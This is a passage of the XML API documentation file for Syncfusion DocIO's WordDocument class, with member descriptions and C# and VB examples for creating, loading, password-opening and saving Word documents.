            <value>The file format type of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.FontSubstitutionTable">
            <summary>
            Gets or sets a dictionary collections which represents the font substitution table. The key should be the font name and the value should be the alternate font name.
            </summary>
            <value>The font substitution table contains an alternative font information for missing fonts in the document.</value>
            <example>
            <para>The following code example demonstrates how to specify the alternative font information for missing fonts  in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Apply the Arial font instead of the Arabic font, if the system does not contains Arabic font
                document.FontSubstitutionTable.Add("Arabic", "Arial");
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Apply the Arial font instead of the Arabic font, if the system does not contains Arabic font
                document.FontSubstitutionTable.Add("Arabic", "Arial");
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.HasMacros">
            <summary>
            Gets a value indicating whether the document has macros. Read-only.
            </summary>
            <value>
            <b>True</b> if the document has macros; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.DEF_NORMAL_STYLE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.DEF_BULLETS_STYLE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.DEF_NUMBERING_STYLE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_builtinProp">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_customProp">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_sections">
            <summary>
            Collection of document sections
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_styles">
            <summary>
            Collection of document styles
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_listStyles">
            <summary>
            Collection of list styles
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_listOverrides">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_bookmarks">
            <summary>
            Collection of bookmarks
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_fields">
            <summary>
            Collection of fields
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_txbxItems">
            <summary>
            Collection of textboxes
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_Comments">
            <summary>
            Collection of Comments.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_defaultTabWidth">
            <summary>
            default value for DefaultTabWidth
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_mailMerge">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_viewSetup">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_watermark">
            <summary>
            Document's watermark;
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_background">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_dop">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_grammarSpellingData">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_escher">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_password">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_macrosData">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_escherDataContainers">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_escherContainers">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_macroCommands">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_defShapeId">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_standardAsciiFont">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_standardFarEastFont">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_standardNonFarEastFont">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_standardBidiFont">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_threadLocker">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_htmlValidationOption">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_latentStyles">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_defCharFormat">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_defParaFormat">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_docxPackage">
            <summary>
            Object which holds structured docx format objects with data stream.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_importOption">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_variables">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_props">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_nextParaItem">
            <summary>
            Field is used for FindNext functionality to define next
            paragraph item.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_prevBodyItem">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_saveOptions">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_docxProps">
            <summary>
            Non parsed properties read from docx file.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_assocStrings">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_isEvalExpired">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_isWarnInserted">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_styleNameIds">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_paraCount">
            <summary>
            paragraphs count in document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_wordCount">
            <summary>
            words count in document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_charCount">
            <summary>
            characters count in document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_fontSubstitutionTable">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_htmlBaseUrl">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_tableOfContent">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_usedFonts">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_settings">
             <summary>
            
             </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_ffnStringTable">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_FloatingItems">
            <summary>
            To hold the all floating items inside the document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_notSupportedElementFlag">
            <summary>
            This flag is used for identify wheteher any un supported elements triggered in Document parsing time
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordDocument.m_supportedElementFlag_1">
            <summary>
            This flag is used for identify what are all the supported elements triggered in the Document
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.#ctor(System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> class from the existing file.
            </summary>
            <param name="fileName">A string that contains the name of the file from which to create the <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <remarks>This constructor is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform and Xamarin platforms.</remarks>
            <example>
            <code lang="C#">
                //Load an existing Word document into WordDocument instance
                WordDocument document = new WordDocument("Sample.docx");
                //Add a new simple paragraph into the last section of the document
                IWParagraph paragraph = document.LastSection.AddParagraph();
                //Add a text range into the paragraph
                paragraph.AppendText("Hello World!");
                //Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            </code>
            <code lang="VB">
                'Load an existing Word document into WordDocument instance
                Dim document As New WordDocument("Sample.docx")
                'Add a new simple paragraph into the last section of the document
                Dim paragraph As IWParagraph = document.LastSection.AddParagraph()
                'Add a text range into the paragraph
                paragraph.AppendText("Hello World!")
                'Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.WSection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.IWParagraph"/>
            <see cref="T:Syncfusion.DocIO.DLS.IWTextRange"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.#ctor(System.String,System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> class from the existing file,
            which is protected with password.
            </summary>
            <param name="fileName">A string that contains the name of the file from which to create the <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="password">The password used to decrypt the protected file.</param>
            <remarks>This constructor is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <code lang="C#">
                //Load an existing Word document into WordDocument instance
                WordDocument document = new WordDocument("Sample.docx", "password");
                //Add a new simple paragraph into the last section of the document
                IWParagraph paragraph = document.LastSection.AddParagraph();
                //Add a text range into the paragraph
                paragraph.AppendText("Hello World!");
                //Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            </code>
            <code lang="VB">
                'Load an existing Word document into WordDocument instance
                Dim document As New WordDocument("Sample.docx", "password")
                'Add a new simple paragraph into the last section of the document
                Dim paragraph As IWParagraph = document.LastSection.AddParagraph()
                'Add a text range into the paragraph
                paragraph.AppendText("Hello World!")
                'Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.WSection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.IWParagraph"/>
            <see cref="T:Syncfusion.DocIO.DLS.IWTextRange"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.#ctor(System.String,Syncfusion.DocIO.FormatType)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> class from the existing file of the specified file format type.
            </summary>
            <param name="fileName">A string that contains the name of the file from which to create the <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="type">The file format type of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <remarks>This constructor is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform and Xamarin platforms.</remarks>
            <example>
            <code lang="C#">
                //Load an existing Word document into WordDocument instance
                WordDocument document = new WordDocument("Sample.docx", FormatType.Docx);
                //Add a new simple paragraph into the last section of the document
                IWParagraph paragraph = document.LastSection.AddParagraph();
                //Add a text range into the paragraph
                paragraph.AppendText("Hello World!");
                //Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            </code>
            <code lang="VB">
                'Load an existing Word document into WordDocument instance
                Dim document As New WordDocument("Sample.docx", FormatType.Docx)
                'Add a new simple paragraph into the last section of the document
                Dim paragraph As IWParagraph = document.LastSection.AddParagraph()
                'Add a text range into the paragraph
                paragraph.AppendText("Hello World!")
                'Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.WSection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.IWParagraph"/>
            <see cref="T:Syncfusion.DocIO.DLS.IWTextRange"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.#ctor(System.String,Syncfusion.DocIO.FormatType,Syncfusion.DocIO.DLS.XHTMLValidationType)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> class from the existing file of the specified file format type with XHTML validation type.
            </summary>
            <param name="fileName">A string that contains the name of the file from which to create the <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="type">The file format type of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="validationType">The XHTML validation type used to validate the HTML file, if the <paramref name="type"/> is <see cref="F:Syncfusion.DocIO.FormatType.Html"/>.</param>
            <remarks>This constructor is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <code lang="C#">
                //Load an existing HTML file into WordDocument instance with Strict validation type
                WordDocument document = new WordDocument("Sample.html", FormatType.Html, XHTMLValidationType.Strict);
                //Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            </code>
            <code lang="VB">
                'Load an existing HTML file into WordDocument instance with Strict validation type
                Dim document As New WordDocument("Sample.html", FormatType.Html, XHTMLValidationType.[Strict])
                'Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.XHTMLValidationType"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.#ctor(System.String,Syncfusion.DocIO.FormatType,System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> class from the
            existing file of the specified file format type, which is protected with password.
            </summary>
            <param name="fileName">A string that contains the name of the file from which to create the <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="type">The file format type of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="password">The password used to decrypt the protected file.</param>
            <remarks>This constructor is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <code lang="C#">
                //Load an existing Word document into WordDocument instance
                WordDocument document = new WordDocument("Sample.docx", FormatType.Docx, "password");
                //Add a new simple paragraph into the last section of the document
                IWParagraph paragraph = document.LastSection.AddParagraph();
                //Add a text range into the paragraph
                paragraph.AppendText("Hello World!");
                //Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            </code>
            <code lang="VB">
                'Load an existing Word document into WordDocument instance
                Dim document As New WordDocument("Sample.docx", FormatType.Docx, "password")
                'Add a new simple paragraph into the last section of the document
                Dim paragraph As IWParagraph = document.LastSection.AddParagraph()
                'Add a text range into the paragraph
                paragraph.AppendText("Hello World!")
                'Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.WSection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.IWParagraph"/>
            <see cref="T:Syncfusion.DocIO.DLS.IWTextRange"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.WordDocumentType(System.String,System.String)">
            <summary>
            Gets the File Type for the Given fileName.
            </summary>
            <param name="fileName"></param>
            <param name="password"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.#ctor(System.IO.Stream,Syncfusion.DocIO.FormatType,Syncfusion.DocIO.DLS.XHTMLValidationType)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> class from the existing data stream of the specified file format type with XHTML validation type.
            </summary>
            <param name="stream">A <see cref="T:System.IO.Stream"/> that contains the data for this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="type">The file format type of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="validationType">The XHTML validation type used to validate the HTML file, if the <paramref name="type"/> is <see cref="F:Syncfusion.DocIO.FormatType.Html"/>.</param>
            <remarks>This constructor is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <code lang="C#">
                Stream htmlFile = new FileStream("Sample.html", FileMode.Open, FileAccess.Read, FileShare.Read);
                //Load an existing Stream into WordDocument instance with Strict validation type
                WordDocument document = new WordDocument(htmlFile, FormatType.Html, XHTMLValidationType.Strict);
                //Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            </code>
            <code lang="VB">
                Dim htmlFile As Stream = New FileStream("Sample.html", FileMode.Open, FileAccess.Read, FileShare.Read)
                'Load an existing Stream into WordDocument instance with Strict validation type
                Dim document As New WordDocument(htmlFile, FormatType.Html, XHTMLValidationType.[Strict])
                'Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.XHTMLValidationType"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> class.
            </summary>
            <example>
            <code lang="C#">
                //Create an instance of WordDocument class
                WordDocument document = new WordDocument();
                //Add a new section into the Word document
                IWSection section = document.AddSection();
                //Specify the page margins
                section.PageSetup.Margins.All = 50f;
                //Add a new simple paragraph into the section
                IWParagraph paragraph = section.AddParagraph();
                //Add a text range into the paragraph
                paragraph.AppendText("Hello World!");
                //Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            </code>
            <code lang="VB">
                'Create an instance of WordDocument class
                Dim document As New WordDocument()
                'Add a new section into the Word document
                Dim section As IWSection = document.AddSection()
                'Specify the page margins
                section.PageSetup.Margins.All = 50F
                'Add a new simple paragraph into the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add a text range into the paragraph
                paragraph.AppendText("Hello World!")
                'Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.IWSection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WPageSetup"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.MarginsF"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.IWParagraph"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.IWTextRange"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.#ctor(System.IO.Stream)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> class from the existing data stream.
            </summary>
            <param name="stream">A <see cref="T:System.IO.Stream"/> that contains the data for this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <example>
            <code lang="C#">
                Stream fileStream = new FileStream("Sample.docx", FileMode.Open, FileAccess.Read, FileShare.Read);
                //Load an existing Stream into WordDocument instance
                WordDocument document = new WordDocument(fileStream);
                //Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            </code>
            <code lang="VB">
                Dim fileStream As Stream = New FileStream("Sample.docx", FileMode.Open, FileAccess.Read, FileShare.Read)
                'Load an existing Stream into WordDocument instance
                Dim document As New WordDocument(fileStream)
                'Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.#ctor(System.IO.Stream,Syncfusion.DocIO.FormatType)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> class from the existing data stream of the specified file format type.
            </summary>
            <param name="stream">A <see cref="T:System.IO.Stream"/> that contains the data for this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="type">The file format type of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <example>
            <code lang="C#">
                Stream fileStream = new FileStream("Sample.docx", FileMode.Open, FileAccess.Read, FileShare.Read);
                //Load an existing Stream into WordDocument instance
                WordDocument document = new WordDocument(fileStream, FormatType.Docx);
                //Add a new simple paragraph into the last section of the document
                IWParagraph paragraph = document.LastSection.AddParagraph();
                //Add a text range into the paragraph
                paragraph.AppendText("Hello World!");
                //Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            </code>
            <code lang="VB">
                Dim fileStream As Stream = New FileStream("Sample.docx", FileMode.Open, FileAccess.Read, FileShare.Read)
                'Load an existing Stream into WordDocument instance
                Dim document As New WordDocument(fileStream, FormatType.Docx)
                'Add a new simple paragraph into the last section of the document
                Dim paragraph As IWParagraph = document.LastSection.AddParagraph()
                'Add a text range into the paragraph
                paragraph.AppendText("Hello World!")
                'Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.#ctor(System.IO.Stream,System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> class from the existing data stream, 
            which is protected with password.
            </summary>
            <param name="stream">A <see cref="T:System.IO.Stream"/> that contains the data for this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="password">The password used to decrypt the protected file.</param>
            <remarks>This constructor is not supported in MVC6 and Xamarin platforms.</remarks>
            <example>
            <code lang="C#">
                Stream fileStream = new FileStream("Sample.docx", FileMode.Open, FileAccess.Read, FileShare.Read);
                //Load an existing Stream into WordDocument instance
                WordDocument document = new WordDocument(fileStream, "password");
                //Add a new simple paragraph into the last section of the document
                IWParagraph paragraph = document.LastSection.AddParagraph();
                //Add a text range into the paragraph
                paragraph.AppendText("Hello World!");
                //Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            </code>
            <code lang="VB">
                Dim fileStream As Stream = New FileStream("Sample.docx", FileMode.Open, FileAccess.Read, FileShare.Read)
                'Load an existing Stream into WordDocument instance
                Dim document As New WordDocument(fileStream, "password")
                'Add a new simple paragraph into the last section of the document
                Dim paragraph As IWParagraph = document.LastSection.AddParagraph()
                'Add a text range into the paragraph
                paragraph.AppendText("Hello World!")
                'Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.#ctor(System.IO.Stream,Syncfusion.DocIO.FormatType,System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> class
            from the existing data stream of the specified file format type, which is protected with password.
            </summary>
            <param name="stream">A <see cref="T:System.IO.Stream"/> that contains the data for this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="type">The file format type of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="password">The password used to decrypt the protected file.</param>
            <remarks>This constructor is not supported in MVC6 and Xamarin platforms.</remarks>
            <example>
            <code lang="C#">
                Stream fileStream = new FileStream("Sample.docx", FileMode.Open, FileAccess.Read, FileShare.Read);
                //Load an existing Stream into WordDocument instance
                WordDocument document = new WordDocument(fileStream, FormatType.Docx, "password");
                //Add a new simple paragraph into the last section of the document
                IWParagraph paragraph = document.LastSection.AddParagraph();
                //Add a text range into the paragraph
                paragraph.AppendText("Hello World!");
                //Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            </code>
            <code lang="VB">
                Dim fileStream As Stream = New FileStream("Sample.docx", FileMode.Open, FileAccess.Read, FileShare.Read)
                'Load an existing Stream into WordDocument instance
                Dim document As New WordDocument(fileStream, FormatType.Docx, "password")
                'Add a new simple paragraph into the last section of the document
                Dim paragraph As IWParagraph = document.LastSection.AddParagraph()
                'Add a text range into the paragraph
                paragraph.AppendText("Hello World!")
                'Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> class from the existing <c>WordDocument</c> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance used to create this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetFormatType(System.String,System.Boolean)">
            <summary>
            Returns the format type based on the file extension of the given file name.
            </summary>
            <param name="fileName"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CreateParagraph">
            <summary>
            Creates a new paragraph.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/> this method created.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.EnsureMinimal">
            <summary>
            Adds a single <see cref="T:Syncfusion.DocIO.DLS.IWSection"/> with one <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/>, when the document contains no sections.
            </summary>
            <example>
            <para>The following code example demonstrates how to add new section with one paragraph to the empty Word document</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Creates a new Word document.
                WordDocument document = new WordDocument();
                //Add a section and a paragraph in the empty document
                document.EnsureMinimal();
                IWParagraph paragraph = document.LastParagraph;
                //Append text to the last paragraph of the document
                paragraph.AppendText("Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua");
                //Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Creates a new Word document.
                Dim document As New WordDocument()
                'Add a section and a paragraph in the empty document
                document.EnsureMinimal()
                Dim paragraph As IWParagraph = document.LastParagraph
                'Append text to the last paragraph of the document
                paragraph.AppendText("Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua")
                'Save and close the Word document
                document.Save("Comment.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.AddSection">
            <summary>
            Adds a new section to document.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWSection"/> this method creates.</returns>
            <example>
            <para>The following code example demonstrates how to add a new section to document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Append the text to the created paragraph
                paragraph.AppendText("A new section is added to the document.");
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Append the text to the created paragraph
                paragraph.AppendText("A new section is added to the document.")
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.AddParagraphStyle(System.String)">
            <summary>
            Adds a new paragraph style to the document.
            </summary>
            <param name="styleName">A String that contains the name of the newly created <see cref="T:Syncfusion.DocIO.DLS.IWParagraphStyle"/></param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWParagraphStyle"/> this method creates.</returns>
            <example>
            <para>The following code example demonstrates how to create a custom paragraph style and apply it to a paragraph.</para>
            <code lang="C#">
